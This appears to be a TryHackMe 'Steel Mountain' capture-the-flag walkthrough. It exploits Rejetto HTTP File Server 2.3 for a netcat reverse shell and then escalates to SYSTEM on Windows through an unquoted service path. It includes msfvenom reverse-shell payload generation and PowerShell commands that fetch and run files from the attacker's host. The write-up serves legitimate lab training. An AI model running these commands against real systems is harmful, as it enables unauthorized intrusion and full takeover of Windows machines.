THM - Steel Mountain

Windows | Rejetto HTTP File Server | Unquoted Service Paths

Tools For This Room

PowerUp.ps1 - script to find privilege escalation methods on Windows - Download it from github: https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
Unquoted Service Paths - a vulnerability whereby a service's executable path contains spaces and isn't enclosed within quotes - more information here: https://pentestlab.blog/2017/03/09/unquoted-service-path/

TLD;DR / Executive Summary

Scan and enumerate with nmap
Gain foothold by exploiting Rejetto HTTP File Server
Privesc by exploiting Unquoted Service Path

Scanning & Enumeration

Let's kick off with an nmap scan

Nmap

nmap -sV -sC -vv <IP>

We get plenty of open ports: 80: HTTP 135: RPC 139: SMB 445: SMB 3389: RDP 8080: HTTP

We check out port80, which gives us the answer to the first question. All we have to do is view page source to get this outstanding individual's name: Bill Harper.

Now let's move on to port8080. We get the home page of HttpFileServer 2.3.

A quick Google search for related exploits yields a python script which only requires the victim IP and port. Fortunately, we have both ingredients. Alternatively, we could also have used searchsploit to find this via terminal.

Gaining Foothold

We need to do 3 things to successfully run this exploit. First, we need to edit the exploit with our IP and selected port. Next we need to open a python server which will host the nc.exe file which will be transferred to the victim machine. Lastly, we need to set up a netcat listener to catch the reverse shell.

We can copy nc.exe to a selected directory, and start the python server.

cp /usr/share/windows-resources/binaries/nc.exe nc.exe
python -m SimpleHTTPServer 80

Now set up the netcat listener.

nc -lvnp <port>

We'll need to run the exploit twice. The first time will get the victim machine to transfer nc.exe over from our machine. The second time will trigger it and get a reverse shell.

python 39161.py <victimIP> 8080

And we're rewarded with a reverse shell.

Let's grab the user.txt:

Privilege Escalation

We can use scripts such as winPEAS.exe or PowerUp.ps1 to find a way to privesc. In this case, we'll go with PowerUp.ps1.

Since we already have a python server running, we can use wget to transfer PowerUp over.

powershell -c wget "http://<ourIP>:<port>/PowerUp.ps1" -outfile "PowerUp.ps1"

Now to execute it.

powershell -ep bypass ./PowerUp.ps1

Looking through the results, we find a service called AdvancedSystemCareService9 with an unquoted service path.

We notice that its path is "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe". We also have the necessary permissiosn to interact with it. If we navigate to that directory, and place a malicious file called Advanced.exe, it will be executed with SYSTEM privileges before ASCService.exe, due to the space between Advanced and SystemCare.

Let's spin up the malicious file using msfvenom on our attacking machine. Ensure the file is in the directory with the earlier python server.

msfvenom -p windows/shell_reverse_tcp LHOST=<ourIP> LPORT=<port> -f exe -o Advanced.exe

Let's also set up a netcat listener to catch the reverse shell later.

nc -lvnp <port>

On the victim machine, let's navigate to the necessary directory.

cd C:\Program Files (x86)\IObit\Advanced SystemCare

Now let's transfer over the malicious file:

powershell -c wget "http://<ourIP>:80/Advanced.exe" -outfile "Advanced.exe"

We'll need to stop and restart the service to trigger it.

sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

Checking our listener, we get a reverse shell!

Let's grab the root flag.

PreviousTHM - Avengers Blog

Last updated 2 months ago

Was this helpful?